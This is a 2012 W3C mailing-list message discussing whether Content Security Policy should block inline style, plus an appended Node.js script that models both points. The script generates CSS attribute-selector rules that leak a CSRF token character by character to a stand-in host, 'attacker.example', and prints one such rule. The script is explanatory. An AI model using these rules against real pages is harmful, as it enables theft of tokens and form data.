- From: Boris Zbarsky <bzbarsky@MIT.EDU>
- Date: Thu, 20 Sep 2012 13:46:27 -0400
- To: Adam Barth <w3c@adambarth.com>
- CC: public-webappsec@w3.org
On 9/20/12 1:19 PM, Adam Barth wrote:
> 1) CSS3 attribute selectors. These are scary because they can be used
> to extract information from the page, such as data typed into <input>
> elements. Blocking the <style> element is enough to mitigate this
> risk.

For now. Until people add selectors to inline styles. There have been
several proposals for that.

(On a side note, it's not clear to me how attribute selectors would leak
data typed into an <input>, unless the page has script stashing the data
into an attribute somewhere....)

> 2) Phishing. If an attacker can inject elements into a page with
> arbitrary style, the attacker can completely change the appearance of
> the page and, for example, make the page show a login screen. This
> attack is more powerful than a traditional phishing attack because the
> browser's location bar will still show the URL of the real web site
> (including any EV indicators or whatnot). To mitigate this risk, we
> need to block both <style> and @style.

Agreed.

> For reference, here's the current text from the spec:
>
> ---8<---
> If 'unsafe-inline' is not in allowed style sources:
>
> * Whenever the user agent would apply style from a style element,
> instead the user agent must ignore the style.
> * Whenever the user agent would apply style from a style attribute,
> instead the user agent must ignore the style.
>
> Note: These restrictions on inline do not prevent the user agent from
> applying style from an external stylesheet (e.g., found via <link
> rel="stylesheet">). The user agent is also not prevented from applying
> style from Cascading Style Sheets Object Model (CSSOM). [CSSOM]
> --->8---
>
> Do you have a specific change to the text that you'd like to propose?

Yes. I think the second bullet point should be more like:

* Whenever the user agent would apply style from a CSS declaration block
  that corresponds to an element's inline style the user agent must
  ignore the style.
It's still a bit weird because http://dev.w3.org/csswg/css-style-attr/ is
all about syntax and then acting "as if" there were a rule but never comes
out and says "there is a declaration block here". The behavior I want
would be a lot easier to define if it did...

Also, I'm still not sure what the "not prevented" bit quoted above about
the CSSOM really means. Does it mean that if I link an external
stylesheet and then modify its CSSOM the modifications should affect the
styles that sheet applied? If so, agreed. Does it mean that if I have a
<style> element and then I modify its CSSOM the modifications should
affect the styles applied by the sheet? This one I'm not quite sure
about...

-Boris
Received on Thursday, 20 September 2012 17:46:56 UTC
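The two points argued above, the attribute-selector leak and the 'unsafe-inline' gate on inline style, modelled as a plain Node.js script. This is an added example and is not code from the thread, the CSP spec or any browser. It has no DOM: an <input> is a small object with separate "attributes" (what markup or setAttribute set) and "properties" (the live .value holding what the user typed), because CSS attribute selectors only ever see the former, which is exactly Boris's aside. The CSP side implements the rule quoted from the spec plus the real style-src to default-src fallback; the beacon host, the "csrf" field name, the hex alphabet and every function name (cspAllowsInlineStyle, buildExfilRules, leakedBeacons, simulateInjectedStyle, demo) are this example's own assumptions. The CSSOM question at the end of the message is deliberately not modelled.

```javascript
'use strict';

// --- Point 2 of the thread: does this policy let inline style apply? ---

// Parse a Content-Security-Policy header value into directive -> source list.
// Per CSP, a directive name that repeats within one policy is ignored after
// its first occurrence, so the first one wins here.
function parseCsp(header) {
  const policy = new Map();
  for (const chunk of header.split(';')) {
    const tokens = chunk.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!policy.has(name)) policy.set(name, tokens.slice(1));
  }
  return policy;
}

// <style> elements and style="" attributes apply only when 'unsafe-inline'
// is among the allowed style sources. style-src falls back to default-src
// when absent; with neither present the policy says nothing about style.
function cspAllowsInlineStyle(header) {
  const policy = parseCsp(header);
  const sources = policy.get('style-src') ?? policy.get('default-src');
  if (sources === undefined) return true;
  return sources.some(src => src.toLowerCase() === "'unsafe-inline'");
}

// --- Point 1: attribute-selector exfiltration, one character per injection ---

// One rule per candidate next character. The single rule whose [value^=...]
// prefix matches loads its beacon URL, telling the attacker that character;
// the next injection starts from the longer prefix.
function buildExfilRules(inputName, known, alphabet, beacon) {
  for (const s of [inputName, known, alphabet]) {
    // Assumption of this example: no CSS string escaping is implemented.
    if (/["\\]/.test(s)) throw new Error('quotes/backslashes not supported');
  }
  return Array.from(alphabet, ch => {
    const prefix = known + ch;
    return {
      inputName,
      valuePrefix: prefix,
      beacon: `${beacon}?p=${encodeURIComponent(prefix)}`,
    };
  });
}

// Render the rules as the text an attacker would drop into an injected <style>.
function rulesToCss(rules) {
  return rules.map(r =>
    `input[name="${r.inputName}"][value^="${r.valuePrefix}"]` +
    `{background-image:url("${r.beacon}")}`).join('\n');
}

// Minimal model of what the selector engine sees: an attribute selector
// tests the content attribute, never the live .value property. Typed data
// is unreachable unless script has copied it into the attribute.
function leakedBeacons(rules, input) {
  const attrValue = input.attributes.value;
  if (typeof attrValue !== 'string') return [];
  return rules
    .filter(r => input.attributes.name === r.inputName &&
                 attrValue.startsWith(r.valuePrefix))
    .map(r => r.beacon);
}

// Both points together: an injected <style> only matters if the policy
// lets inline style apply at all.
function simulateInjectedStyle(cspHeader, rules, input) {
  if (!cspAllowsInlineStyle(cspHeader)) return [];
  return leakedBeacons(rules, input);
}

// Constructed demo data (not from the thread).
const BEACON = 'https://attacker.example/leak';
const RULES = buildExfilRules('csrf', '', '0123456789abcdef', BEACON);

// The user typed "3f9"; nothing copied it into the content attribute.
const TYPED_ONLY = { attributes: { name: 'csrf' }, properties: { value: '3f9' } };
// Page script ran input.setAttribute('value', input.value).
const ATTR_SET = { attributes: { name: 'csrf', value: '3f9' }, properties: { value: '3f9' } };

function demo() {
  return {
    blocked:   simulateInjectedStyle("default-src 'self'; style-src 'self'", RULES, ATTR_SET),
    typedOnly: simulateInjectedStyle("style-src 'self' 'unsafe-inline'", RULES, TYPED_ONLY),
    leaked:    simulateInjectedStyle("style-src 'self' 'unsafe-inline'", RULES, ATTR_SET),
  };
}

console.log(demo());
console.log(rulesToCss(RULES).split('\n')[3]);
```

Running it shows "blocked" and "typedOnly" as empty arrays and "leaked" as a single beacon carrying the first character, "3"; with a 16-symbol alphabet each injection costs 16 rules and recovers one character, so a full token takes one round trip per character. The policy check is intentionally strict about the fallback order: a page that sets default-src 'self' 'unsafe-inline' and then style-src 'self' has inline style blocked, since the more specific directive replaces the fallback rather than adding to it.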